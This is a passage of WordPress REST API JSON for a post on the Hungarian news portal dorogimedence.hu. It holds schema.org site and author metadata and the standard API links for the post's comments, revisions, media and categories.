H\u00edrport\u00e1l"},"image":{"@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/dorogimedence\/"]},{"@type":"Person","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4","name":"dorogimedence.hu","image":{"@type":"ImageObject","inLanguage":"hu","@id":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","url":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","contentUrl":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","caption":"dorogimedence.hu"}}]}},"_links":{"self":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/60856","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/comments?post=60856"}],"version-history":[{"count":0,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/60856\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media\/60858"}],"wp:attachment":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media?parent=60856"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/categories?post=60856"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/tags?post=60856"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}